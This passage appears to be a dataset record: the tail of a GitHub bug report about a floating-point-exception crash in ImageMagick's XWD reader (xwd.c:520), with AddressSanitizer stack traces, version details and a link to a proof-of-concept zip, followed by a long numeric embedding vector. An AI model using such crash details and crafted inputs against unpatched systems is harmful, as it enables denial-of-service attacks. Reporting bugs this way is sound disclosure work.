0x7f06276d4854 in ReadImage MagickCore/constitute.c:547 #3 0x7f06276d778b in ReadImages MagickCore/constitute.c:917 #4 0x7f0626f69817 in IdentifyImageCommand MagickWand/identify.c:321 #5 0x7f0626ffdde0 in MagickCommandGenesis MagickWand/mogrify.c:184 #6 0x55c1ef27bf00 in MagickMain utilities/magick.c:149 #7 0x55c1ef27c186 in main utilities/magick.c:180 #8 0x7f062675ab96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96) #9 0x55c1ef27b979 in _start (/home/hongxu/work/imagemagick/ImageMagick-asan/install/bin/magick+0x1979) ``` fpe_xwd.c:520_1.xwd ``` ASAN:DEADLYSIGNAL ================================================================= ==28450==ERROR: AddressSanitizer: FPE on unknown address 0x7f20a562e210 (pc 0x7f20a562e210 bp 0x000000000000 sp 0x7ffd19f36b80 T0) #0 0x7f20a562e20f (/usr/lib/x86_64-linux-gnu/libX11.so.6+0x2720f) #1 0x7f20a9a166c9 in ReadXWDImage coders/xwd.c:520 #2 0x7f20a92ff854 in ReadImage MagickCore/constitute.c:547 #3 0x7f20a930278b in ReadImages MagickCore/constitute.c:917 #4 0x7f20a8b94817 in IdentifyImageCommand MagickWand/identify.c:321 #5 0x7f20a8c28de0 in MagickCommandGenesis MagickWand/mogrify.c:184 #6 0x55b4ed9adf00 in MagickMain utilities/magick.c:149 #7 0x55b4ed9ae186 in main utilities/magick.c:180 #8 0x7f20a8385b96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96) #9 0x55b4ed9ad979 in _start (/home/hongxu/work/imagemagick/ImageMagick-asan/install/bin/magick+0x1979) ``` ### System Configuration - ImageMagick version:7.0.8-41 Q16 x86_64 2019-04-14 - Environment (Operating system, version and so on): Ubuntu 18.04 LTS, x84_64 - Additional information: This was firstly detected in GraphicsMagick, but I found this also happens in ImageMagick 6/7. POCs: [im.zip](https://github.com/ImageMagick/ImageMagick/files/3077110/im.zip) --- end body ---
3,012
[ -0.03551798686385155, 0.012832081876695156, -0.0041115181520581245, -0.004263540729880333, 0.026410456746816635, 0.019030455499887466, -0.008741294965147972, 0.02247169241309166, -0.012286183424293995, 0.010302980430424213, -0.020910006016492844, -0.007072501815855503, 0.02155955694615841, 0.010558654554188251, -0.009763991460204124, 0.02226438745856285, -0.014552700333297253, 0.03139955922961235, -0.050112150609493256, -0.013868599198758602, -0.003855843795463443, 0.004439748357981443, 0.000015520765373366885, 0.013308879919350147, 0.0066717155277729034, -0.001754305325448513, -0.028690794482827187, 0.0020350287668406963, -0.004484664183109999, -0.009017699398100376, 0.011608991771936417, 0.00035479117650538683, 0.008444159291684628, 0.05041619390249252, 0.03272630274295807, -0.01749640889465809, 0.01956944353878498, 0.05964810773730278, 0.004256630316376686, 0.01623876951634884, -0.0010702039580792189, -0.05376068875193596, 0.0135300038382411, 0.028967199847102165, -0.042649224400520325, -0.024074837565422058, 0.0028987929690629244, -0.0032805767841637135, -0.03432944789528847, 0.011222025379538536, -0.0036243549548089504, -0.0072348895482718945, -0.04439057409763336, -0.02797214314341545, 0.00978472176939249, -0.019472701475024223, 0.05243394896388054, 0.03728697821497917, 0.005873597227036953, -0.026977086439728737, -0.01820124126970768, 0.027598995715379715, 0.0077324179001152515, 0.0252357367426157, 0.010779778473079205, 0.02379843406379223, -0.009031519293785095, 0.01802157796919346, -0.03839259594678879, -0.023079782724380493, -0.005414074752479792, -0.012997925281524658, 0.029133042320609093, 0.025332478806376457, 0.009964385069906712, -0.0014070720644667745, 0.031731244176626205, -0.0017828095005825162, -0.021200230345129967, 0.006543878465890884, -0.04850900173187256, 0.051190126687288284, -0.027073828503489494, 0.04530270770192146, 0.04345079883933067, 0.003499972866848111, -0.05243394896388054, -0.06340721249580383, -0.0231765229254961, 0.005379524081945419, 0.021062027662992477, 0.04035506770014763, -0.0026431186124682426, 0.01324668899178505, 0.015285172499716282, -0.026659220457077026, -0.04300855100154877, 0.00297998683527112, -0.061582937836647034, -0.009618879295885563, -0.006920479703694582, -0.0040044113993644714, -0.013391801156103611, 0.00040165038080886006, -0.02110348828136921, -0.011657362803816795, -0.006416040938347578, -0.030017536133527756, 0.02299685962498188, 0.1525753289461136, -0.022430231794714928, -0.01188539620488882, -0.05243394896388054, -0.025926748290657997, 0.006167277228087187, 0.0333343930542469, 0.02954764850437641, 0.001480491948314011, -0.036319561302661896, -0.009446126408874989, -0.0131292175501585, -0.01666719652712345, -0.013840959407389164, 0.019555622711777687, -0.015340453945100307, 0.04392068833112717, 0.014145003631711006, 0.013951520435512066, -0.03145483881235123, -0.013281240127980709, -0.019680006429553032, -0.04298090934753418, 0.011063093319535255, -0.016363151371479034, -0.023217983543872833, -0.025982029736042023, -0.0461319237947464, 0.0319800078868866, 0.025042254477739334, -0.02198798395693302, -0.06893529742956161, -0.038669001311063766, 0.021117309108376503, 0.025056075304746628, -0.020246634259819984, 0.024406524375081062, -0.01945888251066208, -0.030183378607034683, 0.024337422102689743, -0.007421462796628475, -0.032256413251161575, 0.017164723947644234, 0.005935788154602051, 0.0012809624895453453, 0.03076382912695408, -0.007566574960947037, 0.04577259719371796, 0.03651304543018341, -0.008623822592198849, -0.04574495553970337, -0.009812362492084503, -0.04372720420360565, 0.008810395374894142, -0.04311911389231682, -0.005607557948678732, -0.010537924244999886, 0.009128261357545853, 0.01865730807185173, 0.011664273217320442, 0.018256522715091705, 0.020605960860848427, -0.0216977596282959, -0.01854674704372883, -0.01977674663066864, -0.0454409122467041, 0.04143304377794266, -0.007483653724193573, 0.0522957444190979, -0.00535533856600523, -0.020564500242471695, 0.0070759570226073265, -0.01149842981249094, 0.0008702425402589142, 0.007836069911718369, 0.018560567870736122, -0.016528993844985962, 0.03300270438194275, -0.020605960860848427, -0.0050547486171126366, 0.0007043997757136822, 0.020992927253246307, -0.017800454050302505, 0.0020833995658904314, -0.020453939214348793, 0.029409445822238922, -0.008527081459760666, -0.01426247600466013, -0.025595063343644142, 0.007939721457660198, -0.009370114654302597, 0.0029575289227068424, -0.02551214210689068, -0.011139104142785072, 0.015810340642929077, -0.015976184979081154, 0.019997870549559593, -0.02685270458459854, 0.03115079551935196, 0.0007186518632806838, -0.012078879401087761, -0.01851910725235939, -0.04347844049334526, 0.01929304003715515, 0.0037729223258793354, -0.05704990401864052, -0.004298090934753418, 0.003341040341183543, 0.0027830484323203564, -0.024213040247559547, -0.04182001203298569, 0.0312889963388443, -0.026838883757591248, -0.013868599198758602, 0.0008745613158680499, -0.019196297973394394, -0.017441129311919212, -0.0021507730707526207, 0.0078775305300951, -0.055502038449048996, 0.007290170527994633, 0.03535214439034462, -0.03325147181749344, 0.0028106889221817255, 0.0023667141795158386, -0.001764670480042696, -0.011754104867577553, -0.016598094254732132, -0.008879496715962887, -0.013371070846915245, -0.0006758955423720181, 0.025249557569622993, -0.004850900266319513, 0.0005307831452228129, -0.02082708477973938, 0.003303034696727991, 0.01517461147159338, -0.005877052433788776, 0.010703766718506813, -0.000568788789678365, 0.01833944395184517, 0.02607877179980278, -0.013744217343628407, 0.012728430330753326, -0.001049473648890853, 0.008223036304116249, -0.01739966869354248, 0.004574495833367109, 0.024199219420552254, -0.015506296418607235, 0.005597192794084549, 0.031703606247901917, 0.02776484005153179, -0.005472810473293066, 0.010634666308760643, 0.006288203876465559, 0.0010080129140987992, -0.01589326374232769, -0.019735286012291908, 0.02929888479411602, -0.014994948171079159, 0.023936636745929718, -0.021711578592658043, -0.009342474862933159, -0.02740551345050335, -0.0093079237267375, -0.008492530323565006, 0.004564130678772926, -0.008395789191126823, 0.01578270085155964, -0.009252643212676048, -0.0028314192313700914, 0.012438206002116203, -0.01735820807516575, 0.014704722911119461, 0.017524050548672676, 0.0012395017547532916, -0.0013984343968331814, -0.029796412214636803, -0.03756337985396385, -0.033583156764507294, -0.004470843821763992, 0.009231912903487682, -0.051438890397548676, 0.011581351980566978, 0.005151490215212107, 0.01690213941037655, -0.025083715096116066, 0.0033185824286192656, -0.02614787220954895, -0.016045285388827324, -0.0159900039434433, -0.023217983543872833, -0.0073178112506866455, 0.005586827639490366, 0.00392148969694972, 0.008140115067362785, -0.0045364899560809135, 0.006578428670763969, -0.0033773183822631836, -0.027391692623496056, 0.021905062720179558, 0.008305957540869713, -0.01431775651872158, -0.01202359888702631, -0.02614787220954895, -0.011222025379538536, 0.01728910580277443, -0.023618770763278008, 0.010123317129909992, -0.0165566336363554, -0.012597138062119484, -0.00484053511172533, -0.04546855390071869, 0.026838883757591248, 0.046601809561252594, -0.013447082601487637, -0.018076859414577484, 0.01904427446424961, -0.08098653703927994, -0.019624724984169006, 0.010869610123336315, -0.04112900048494339, -0.023411467671394348, -0.017911016941070557, 0.02418540045619011, -0.029934614896774292, -0.03537978604435921, 0.007179608568549156, 0.012873543426394463, 0.03131663799285889, -0.015229891985654831, 0.0522957444190979, -0.04035506770014763, -0.06478922814130783, 0.02009461261332035, -0.0044190180487930775, 0.012956464663147926, 0.0028003237675875425, -0.009480676613748074, -0.007518204394727945, 0.0009095437708310783, 0.04707169905304909, -0.016888318583369255, 0.034384727478027344, -0.0038765741046518087, -0.005047838669270277, -0.024973152205348015, -0.02621697448194027, 0.024005737155675888, -0.02471056953072548, -0.036208998411893845, -0.022181466221809387, -0.015837982296943665, -0.007863709703087807, 0.021905062720179558, 0.009093710221350193, -0.014898206107318401, -0.02891191840171814, -0.028124164789915085, 0.008927867747843266, 0.0010408359812572598, 0.05876361206173897, -0.028469670563936234, 0.02023281529545784, -0.040797315537929535, -0.023480568081140518, 0.0023477112408727407, 0.0001384182251058519, -0.028580233454704285, 0.020136073231697083, -0.0573263093829155, 0.01568595878779888, 0.010752137750387192, -0.04502630606293678, 0.03800562769174576, 0.037784505635499954, -0.02555360272526741, 0.020066972821950912, 0.027751019224524498, -0.035158660262823105, -0.034882258623838425, 0.05268271267414093, -0.043174393475055695, -0.03913888707756996, -0.011277306824922562, 0.05099664255976677, 0.008824216201901436, -0.02502843365073204, 0.024793490767478943, -0.011705733835697174, -0.0016117842169478536, -0.003128554206341505, 0.007200339343398809, 0.02057832106947899, 0.0014234835980460048, 0.042759787291288376, -0.005417529493570328, 0.001706798211671412, 0.025042254477739334, 0.02573326602578163, -0.008077923208475113, 0.010137137956917286, -0.018988994881510735, 0.008637642487883568, 0.031233716756105423, 0.0029661664739251137, -0.020744163542985916, 0.007051771506667137, -0.025525962933897972, -0.01377185806632042, -0.0038385684601962566, 0.008990058675408363, 0.011698823422193527, 0.008679104037582874, -0.013419441878795624, 0.019652364775538445, -0.0012921913294121623, 0.012541857548058033, 0.042400460690259933, -0.0008948597824200988, -0.03775686398148537, -0.0199840497225523, 0.015160790644586086, 0.013377981260418892, -0.019997870549559593, -0.00139325181953609, -0.030017536133527756, -0.0030249024275690317, 0.0037141863722354174, -0.016059106215834618, -0.009743261151015759, 0.029354166239500046, -0.03115079551935196, -0.01641843095421791, -0.013944610953330994, -0.016985060647130013, -0.03366607800126076, 0.019680006429553032, 0.007269440218806267, -0.02635517530143261, -0.006626799702644348, 0.01722000539302826, -0.00606362521648407, -0.016197307035326958, 0.013184498064219952, 0.012389834970235825, -0.03748045861721039, -0.027668097987771034, 0.018615847453475, -0.007193428929895163, 0.0060187093913555145, 0.03651304543018341, -0.008623822592198849, 0.0003023174940608442, 0.006716630887240171, 0.01634933054447174, -0.019403601065278053, -0.026769783347845078, 0.00889331754297018, -0.003776377532631159, -0.007048316765576601, 0.02212618663907051, -0.010344441048800945, 0.016197307035326958, -0.00999202486127615, 0.0003899895818904042, -0.02610641159117222, 0.00033794777118600905, 0.005130759906023741, -0.051438890397548676, 0.030819110572338104, -0.06456810981035233, -0.014801464974880219, -0.01831180229783058, 0.026064950972795486, -0.005431349854916334, 0.01827034167945385, -0.0014459413941949606, -0.0033375851344317198, 0.019168656319379807, -0.0012135888682678342, 0.02002551220357418, -0.009874553419649601, -0.04953169822692871, -0.024240681901574135, 0.016363151371479034, -0.045219786465168, -0.03913888707756996, 0.05782383680343628, 0.02372933179140091, 0.024005737155675888, -0.0024686383549124002, -0.007124328054487705, -0.010054216720163822, 0.026438096538186073, -0.0020160258281975985, -0.027156749740242958, -0.009287193417549133, -0.029934614896774292, -0.048868328332901, 0.03532450273633003, -0.049863383173942566, 0.035794392228126526, -0.03847551718354225, -0.002684579463675618, -0.017054162919521332, 0.018560567870736122, -0.017109442502260208, 0.029381806030869484, 0.01002657599747181, 0.0052516870200634, -0.01722000539302826, 0.011367138475179672, 0.05677349865436554, 0.02852495200932026, 0.01498112827539444, 0.01680539734661579, -0.0022803377360105515, -0.001548729371279478, -0.02740551345050335, 0.011733374558389187, -0.004173709079623222, -0.01284590270370245, 0.007905170321464539, -0.012196351774036884, 0.020605960860848427, -0.027847761288285255, -0.003292669542133808, 0.013585284352302551, -0.016072925180196762, -0.02009461261332035, 0.02660394087433815, 0.006343484856188297, -0.011242755688726902, -0.0042704506777226925, 0.016611915081739426, -0.024669108912348747, 0.023922815918922424, -0.003372135804966092, 0.01022005919367075, 0.0047990744933485985, -0.0034498744644224644, -0.015699779614806175, 0.014925846830010414, -0.00014252110850065947, 0.009611968882381916, -0.004584860987961292, -0.0064298612996935844, 0.0315101221203804, 0.0014493964845314622, -0.006333119701594114, -0.008844946511089802, 0.005389889236539602, 0.014580341055989265, 0.019306859001517296, -0.00625710841268301, -0.0010822965996339917, 0.027364052832126617, -0.06606069207191467, -0.03314090892672539, 0.03872428089380264, 0.030045177787542343, -0.035020459443330765, -0.011367138475179672, -0.014234835281968117, -0.0019469247199594975, -0.004958007019013166, -0.030155738815665245, 0.011864665895700455, -0.02849731221795082, 0.02733641304075718, -0.02482113055884838, -0.01169191300868988, 0.027073828503489494, -0.009466856718063354, -0.013094666413962841, 0.008001912385225296, -0.017662251368165016, -0.018505286425352097, -0.020605960860848427, -0.0027312226593494415, 0.030128099024295807, -0.0027830484323203564, 0.027903040871024132, 0.01592090353369713, 0.007041406352072954, 0.0070759570226073265, 0.0052136811427772045, 0.023646410554647446, -0.010448092594742775, -0.021587196737527847, 0.0085063511505723, -0.008423428982496262, -0.03504810109734535, -0.03444001078605652, -0.013889329507946968, 0.010095677338540554, 0.006156912073493004, -0.0042808158323168755, -0.01123584620654583, 0.032256413251161575, 0.024655288085341454, 0.014034442603588104, 0.0017093895003199577, 0.024309782311320305, 0.004736883565783501, 0.0018035398097708821, 0.012714610435068607, -0.00901078898459673, 0.02653483860194683, 0.012825172394514084, -0.05387125164270401, -0.012403654865920544, 0.021062027662992477, 0.0009190451819449663, 0.0304874237626791, -0.01623876951634884, -0.005296602845191956, -0.007677136920392513, -0.024268321692943573, -0.007200339343398809, 0.015851803123950958, 0.014414498582482338, -0.018961353227496147, -0.006616434548050165, 0.0296858511865139, 0.02274809591472149, -0.01538191456347704, -0.046822935342788696, -0.03294742479920387, 0.015008768066763878, 0.0179248359054327, -0.007912080734968185, 0.010862699709832668, -0.020992927253246307, -0.025539781898260117, 0.026451917365193367, 0.0057526701129972935, 0.028690794482827187, 0.026645401492714882, -0.03167596459388733, -0.003247753717005253, 0.018684949725866318, 0.00836814846843481, 0.004208259750157595, -0.002518736757338047, 0.03247753903269768, 0.02607877179980278, -0.0053069679997861385, -0.035269223153591156, 0.005600647535175085, -0.003499972866848111, -0.019099555909633636, 0.014635622501373291, 0.016183488070964813, -0.001952107297256589, -0.047237541526556015, -0.027364052832126617, 0.02719821035861969, 0.025083715096116066, 0.03275394067168236, -0.017441129311919212, -0.0010926618706434965, -0.0016368333017453551, 0.005794130731374025, -0.011781744658946991, 0.013640565797686577, 0.0010771140223369002, 0.017579330131411552, 0.0008451933390460908, 0.02530483901500702, 0.0028314192313700914, 0.007117417640984058, -0.00028180310619063675, -0.028220906853675842, 0.01274225115776062, -0.017579330131411552, -0.005182585678994656, -0.005621377844363451, -0.01293573435395956, 0.022236747667193413, -0.026438096538186073, -0.008167754858732224, 0.0037003662437200546, -0.0010062854271382093, 0.0022596074268221855, 0.0064298612996935844, -0.0029644391033798456, -0.016473712399601936, 0.0018398179672658443, -0.058155521750450134, 0.01578270085155964, 0.0030456329695880413, 0.014013711363077164, 0.01592090353369713, -0.0022146916016936302, -0.0002177765709348023, 0.01556157786399126, -0.006433316506445408, 0.02198798395693302, -0.016653375700116158, -0.005279327277094126, -0.04403124749660492, 0.03076382912695408, 0.008147024549543858, -0.0016066015232354403, 0.012265453115105629, -0.0014468051958829165, -0.019168656319379807, -0.017482589930295944, 0.011173655278980732, -0.01802157796919346, -0.008796575479209423, -0.04245574399828911, 0.016915960237383842, -0.01557539775967598, 0.005624833051115274, 0.008540901355445385, 0.003990591038018465, 0.018035398796200752, -0.01274225115776062, -0.009522137232124805, 0.008478710427880287, 0.013903150334954262, 0.011968318372964859, -0.007545844651758671, 0.007262530270963907, 0.008630733005702496, 0.0004647051973734051, -0.025387760251760483, 0.0004923456581309438, -0.029796412214636803, 0.0037832874804735184, -0.03112315572798252, 0.004505394492298365, -0.019237758591771126, -0.0008879497181624174, 0.010862699709832668, -0.023618770763278008, 0.01883697137236595, 0.013640565797686577, 0.020813263952732086, -0.010316800326108932, -0.017565511167049408, -0.02265135385096073, -0.01202359888702631, 0.010240789502859116, -0.02558124251663685, -0.006910114083439112, -0.02495933324098587, 0.003824748331680894, -0.018035398796200752, -0.014221015386283398, 0.011277306824922562, 0.0577685572206974, 0.009708710946142673, -0.00715887825936079, -0.020467758178710938, 0.02390899509191513, 0.008437249809503555, -0.009425396099686623, 0.011643542908132076, -0.02142135426402092, -0.002833146834746003, 0.029602929949760437, -0.012769890949130058, 0.005590282380580902, -0.00606362521648407, 0.04046563059091568, 0.029133042320609093, -0.018228881061077118, -0.006288203876465559, -0.05652473494410515, 0.02674214169383049, 0.009860733523964882, -0.036457762122154236, -0.005382978823035955, -0.023190343752503395, -0.029602929949760437, 0.009791632182896137, -0.028262367472052574, -0.021960344165563583, 0.03582203388214111, -0.040133945643901825, 0.004474299028515816, -0.015285172499716282, 0.0060083442367613316, -0.0012032235972583294, -0.005790675990283489, -0.004933821503072977, -0.00010548721184022725, 0.007145058363676071, -0.01778663508594036, -0.035545628517866135, -0.01977674663066864, -0.016197307035326958, -0.01854674704372883, 0.02954764850437641, -0.019099555909633636, -0.0077531482093036175, 0.016266409307718277, 0.01424865610897541, 0.03258809819817543, 0.025083715096116066, -0.017717532813549042, -0.011615902185440063, -0.019873488694429398, -0.003980225883424282, 0.005434805061668158, 0.016183488070964813, -0.05044383555650711, 0.0070759570226073265, -0.024669108912348747, -0.031344279646873474, -0.04032742604613304, -0.02555360272526741, -0.0009734623599797487, -0.007469833362847567, 0.03665124624967575, -0.0012490031076595187, -0.024074837565422058, -0.03618135675787926, -0.004467389080673456, -0.009093710221350193, 0.010213148780167103, 0.020605960860848427, -0.01071067713201046, 0.004197894595563412, -0.04621484503149986, 0.03665124624967575, 0.019804388284683228, 0.011643542908132076, 0.004598680883646011, -0.0183809045702219, -0.007428372744470835, 0.0013276056852191687, -0.013412531465291977, 0.002674214309081435, -0.014400678686797619, 0.020329555496573448, 0.032532818615436554, 0.018532926216721535, -0.013592194765806198, 0.03598787635564804, -0.008513260632753372, -0.014221015386283398, -0.03723169490695, 0.007145058363676071, 0.0012904638424515724, -0.021296972408890724, 0.012624778784811497, 0.02726731076836586, -0.005286237224936485, -0.002743315417319536, 0.014359217137098312, -0.005562642123550177, 0.006412586197257042, -0.0023287085350602865, -0.007248709909617901, -0.0010131954913958907, -0.02009461261332035, -0.04557911306619644, 0.04428001120686531, -0.02793068252503872, -0.02162865735590458, -0.003432599361985922, -0.026272254064679146, -0.0019002814078703523, 0.005196406040340662, 0.018007757142186165, -0.014760004356503487, 0.013495453633368015, 0.012776801362633705, 0.03126135841012001, -0.011118373833596706, -0.03286450356245041, -0.001127212424762547, -0.021545736119151115, -0.005448624957352877, -0.006412586197257042, 0.019030455499887466, 0.007207249291241169, -0.03258809819817543, -0.0021248601842671633, 0.002793413819745183, 0.016584273427724838, -0.02079944498836994, -0.021711578592658043, -0.019541803747415543, -0.023148883134126663, -0.017980117350816727, -0.02128315158188343, 0.0270600076764822, -0.008623822592198849, 0.003099186345934868, -0.021504275500774384, 0.02404719777405262, 0.01568595878779888, -0.0030680906493216753, 0.015948543325066566, 0.02600966952741146, -0.011056182906031609, 0.0129011832177639, -0.019790567457675934, 0.009611968882381916, -0.011837026104331017, -0.023687871173024178, -0.00023429606517311186, 0.0015763698611408472, 0.009466856718063354, -0.010959440842270851, -0.0028279642574489117, -0.013122307136654854, -0.002948891371488571, 0.010579384863376617, -0.020136073231697083, -0.02551214210689068, 0.013481632806360722, -0.015188431367278099, 0.003313399851322174, 0.00006391856004483998, 0.020882366225123405, 0.038669001311063766, -0.0011608991771936417, -0.015672139823436737, 0.000328446360072121, -0.023217983543872833, -0.00769095728173852, -0.007462923415005207, -0.036457762122154236, 0.009881463833153248, 0.006720086093991995, 0.010593205690383911, -0.004405197687447071, 0.01451123971492052, 0.0010702039580792189, 0.005628288257867098, -0.0015634134178981185, -0.02002551220357418, -0.02982405386865139, -0.02491787262260914, -0.01739966869354248, -0.006457502022385597, -0.0109041603282094, -0.01959708333015442, 0.010171688161790371, -0.016390791162848473, 0.01281135156750679, -0.009342474862933159, 0.01921011693775654, 0.0046401419676840305, 0.010088766925036907, -0.03720405697822571, -0.007400732487440109, 0.0023891720920801163, 0.01011640764772892, -0.03377663716673851, -0.01592090353369713, -0.03405304253101349, -0.030376862734556198, -0.006291659083217382, 0.005804495885968208, 0.03021102026104927, 0.02411629818379879, -0.009135170839726925, 0.018297983333468437, 0.0105033740401268, -0.009632699191570282, -0.003017992479726672, -0.0036554504185914993, -0.03256046026945114, -0.002188778715208173, 0.05359484627842903, 0.012500396929681301, -0.02005315199494362, -0.0065576983615756035, 0.022485511377453804, 0.013149947859346867, -0.027073828503489494, -0.006554243620485067, -0.002254424849525094, -0.012376015074551105, 0.025539781898260117, -0.038447875529527664, -0.0006426406325772405, 0.008257586508989334, -0.053124960511922836, -0.003638175083324313, -0.013813318684697151, 0.0025049163959920406, -0.027695737779140472, 0.0019071915885433555, 0.015603038482367992, 0.00035047237179242074, -0.023687871173024178, -0.01139477826654911, -0.0003796243981923908, 0.032007649540901184, -0.009833092801272869, -0.014690903015434742, -0.009480676613748074, 0.005963428877294064, 0.02824854664504528, -0.014110453426837921, 0.02295539900660515, -0.0030611807014793158, -0.024074837565422058, -0.007836069911718369, 0.007269440218806267, 0.0390559658408165, -0.03010045737028122, 0.012825172394514084, -0.0340254046022892, -0.03759102150797844, -0.0003057725552935153, 0.011367138475179672, -0.016791578382253647, 0.008271406404674053, 0.021324612200260162, -0.0076149459928274155, 0.029464727267622948, 0.001372521510347724, 0.024157758802175522, -0.0004806848301086575, -0.025180457159876823, -0.01897517405450344, 0.02681124396622181, -0.03772922232747078, -0.04364428296685219, 0.016017645597457886, 0.03582203388214111, -0.018145959824323654, 0.0038316582795232534, -0.009003878571093082, -0.014953487552702427, -0.00045088495244272053, 0.021960344165563583, -0.03209057077765465, -0.0073178112506866455, -0.03419124707579613, 0.0115329809486866, 0.024489445611834526, 0.04425237327814102, -0.034108325839042664, -0.017772814258933067, 0.007435283157974482, -0.017579330131411552, -0.030984953045845032, 0.022692816331982613, 0.004909635987132788, -0.004774888977408409, -0.0129011832177639, 0.011450059711933136, -0.019417421892285347, 0.004291180986911058, -0.003956040367484093, -0.014138094149529934, 0.0023580763954669237, -0.004436293616890907, -0.0005959973786957562, 0.003038722788915038, 0.035545628517866135, 0.0009009061614051461, -0.009142081253230572, 0.02804124355316162, -0.015603038482367992, 0.03432944789528847, -0.011173655278980732, -0.020910006016492844, -0.011512250639498234, 0.006170731969177723, -0.0034291441552340984, 0.008271406404674053, 0.0147876450791955, -0.03670652583241463, 0.03806091099977493, 0.007601125631481409, -0.014884386211633682, 0.004920001607388258, 0.01076595764607191, -0.017302926629781723, -0.00831286795437336, -0.007504384033381939, -0.016197307035326958, -0.011035452596843243, -0.017620790749788284, 0.009542867541313171, 0.10144047439098358, -0.012389834970235825, -0.034108325839042664, -0.01806303858757019, 0.002900520572438836, 0.008948598057031631, -0.013046295382082462, 0.021117309108376503, -0.008354328572750092, -0.006516237743198872, 0.020675061270594597, -0.01628023013472557, -0.01405517291277647, 0.01081432867795229, 0.01988730952143669, 0.003966405522078276, -0.003824748331680894, -0.002491096267476678, 0.035131022334098816, -0.01245893631130457, 0.006277838721871376, -0.002396082039922476, 0.016183488070964813, -0.019583264365792274, 0.01466326229274273, -0.014207195490598679, -0.009072979912161827, -0.019583264365792274, -0.027253489941358566, -0.018007757142186165, -0.003303034696727991, -0.013212138786911964, 0.001198041019961238, 0.011049272492527962, 0.0018899162532761693, 0.007324721198529005, 0.024793490767478943, -0.0157550610601902, 0.007051771506667137, 0.007020676042884588, -0.010717587545514107, -0.018823150545358658, 0.002677669283002615, -0.0060187093913555145, -0.0033686808310449123, -0.02258225344121456, 0.012534947134554386, -0.008734384551644325, -0.010164777748286724, 0.02117259055376053, 0.00910062063485384, -0.012507307343184948, 0.015271352604031563, -0.010268430225551128, 0.0001268653868464753, 0.004481208976358175, -0.031703606247901917, -0.003258118871599436, -0.027046186849474907, 0.000646959466394037, -0.008976238779723644, 0.005068568978458643, -0.012714610435068607, -0.012859722599387169, -0.0005368295242078602, -0.027046186849474907, -0.018878431990742683, 0.005718119442462921, -0.014179554767906666, 0.03902832418680191, 0.02471056953072548, 0.012258542701601982, -0.007262530270963907, 0.009874553419649601, -0.007248709909617901, 0.02905012108385563, 0.01424865610897541, 0.009142081253230572, -0.0157550610601902, -0.033942483365535736, 0.029575290158391, 0.029630569741129875, 0.020951466634869576, 0.03482697531580925, 0.005849411711096764, 0.01669483631849289, -0.012597138062119484, -0.015934724360704422, 0.016003824770450592, -0.0028659699019044638, 0.016294049099087715, -0.004833625163882971, 0.024807309731841087, -0.004702332895249128, 0.005707754287868738, 0.008782755583524704, -0.0009337291703559458, 0.014953487552702427, -0.010385901667177677, -0.011380958370864391, 0.00013096825568936765, -0.008347418159246445, 0.004940731916576624, 0.005078934133052826, -0.020675061270594597, 0.005120394751429558, -0.01242438517510891, 0.020039331167936325, 0.0010071491124108434, -0.007746238261461258, -0.05019507184624672, -0.02288629859685898, 0.010593205690383911, -0.01610056683421135, 0.01099399197846651, 0.021379893645644188, 0.01616966724395752, -0.00768404733389616, -0.02712910808622837, -0.026203153654932976, -0.0005148035124875605, -0.014359217137098312, 0.03783978521823883, -0.008098653517663479, -0.002041938714683056, 0.025664163753390312, -0.007608036044985056, -0.020080791786313057, 0.03178652748465538, 0.01820124126970768, 0.015672139823436737, 0.00009188292460748926, 0.013550734147429466, -0.019790567457675934, 0.017772814258933067, -0.004978737328201532, -0.01524371188133955, 0.008533990941941738, -0.02489023096859455, 0.003814383177086711, -0.021089669317007065, 0.008077923208475113, 0.025595063343644142, -0.01637697033584118, 0.009881463833153248, 0.011602082289755344, 0.005811406299471855, -0.018007757142186165, 0.0014830832369625568, 0.03178652748465538, -0.030017536133527756, -0.016722476109862328, 0.007552755065262318, 0.012859722599387169, 0.006996490526944399, 0.009231912903487682, 0.017026521265506744, -0.02272045612335205, -0.02754371613264084, 0.002993806963786483, 0.008879496715962887, -0.005248231813311577, 0.004508849699050188, -0.01163663249462843, -0.006972305476665497, 0.026935625821352005, 0.006792642176151276, -0.028276188299059868, -0.051190126687288284, -0.0399680994451046, 0.020592140033841133, 0.01630786992609501, -0.01890607364475727, 0.015630679205060005, 0.028994839638471603, -0.003411869052797556, 0.00192273932043463, 0.006654439959675074, 0.02377079240977764, -0.0065369680523872375, -0.0010581112001091242, 0.019375961273908615, -0.0029558013193309307, 0.014815284870564938, 0.017054162919521332, -0.033417314291000366, 0.014939666725695133, 0.005531546659767628, -0.01739966869354248, 0.013536914251744747, 0.022692816331982613, 0.036319561302661896, -0.011788655072450638, -0.051825858652591705, 0.0023304361384361982, -0.02544304169714451, -0.0026534839998930693, -0.010261519812047482, -0.0019814753904938698, 0.024724388495087624, -0.00992292445152998, -0.019873488694429398, -0.001698160544037819, 0.01774517446756363, 0.010855789296329021, -0.0324222557246685, 0.004681602586060762, -0.004460478667169809, 0.0010062854271382093, -0.00939775537699461, -0.015934724360704422, 0.015423375181853771, -0.01914101652801037, -0.0038696639239788055, -0.023328546434640884, -0.01333652064204216, -0.018698768690228462, -0.019306859001517296, 0.001422619796358049, -0.006854833569377661, 0.00445356871932745, 0.01589326374232769, 0.010828149504959583, 0.017938656732439995, -0.014034442603588104, 0.013225958682596684, 0.02891191840171814, -0.013433261774480343, -0.013087756931781769, 0.01169191300868988, -0.008561631664633751, 0.006941210012882948, 0.0012913276441395283, 0.022609893232584, -0.008969328366219997, -0.0340254046022892, 0.008851855993270874, -0.008299047127366066, 0.017800454050302505, -0.011795565485954285, -0.006775367073714733, -0.0013638838427141309, -0.014428318478167057, -0.01603146456182003, -0.006243288051337004, -0.00020006940758321434, 0.021683938801288605, -0.029934614896774292, -0.02338382601737976, 0.0018899162532761693, -0.02982405386865139, 0.005939243361353874, -0.004664327017962933, 0.0033116722479462624, 0.01002657599747181, 0.023287085816264153, -0.005438259802758694, 0.0028849728405475616, 0.020785624161362648, -0.003529340960085392, 0.013854779303073883, -0.024904051795601845, -0.027944501489400864, 0.02215382643043995, -0.009943654760718346, 0.004830169957131147, -0.010496463626623154, -0.0037210965529084206, 0.02016371302306652, 0.0029782592318952084, 0.007656406611204147, 0.004850900266319513, -0.010759048163890839, -0.029271245002746582, -0.011228935793042183, -0.005403709597885609, -0.004394832532852888, -0.010703766718506813, 0.0035276133567094803, 0.006464411970227957, 0.01241056527942419, 0.059205859899520874, -0.011795565485954285, -0.015727419406175613, -0.03681708872318268, 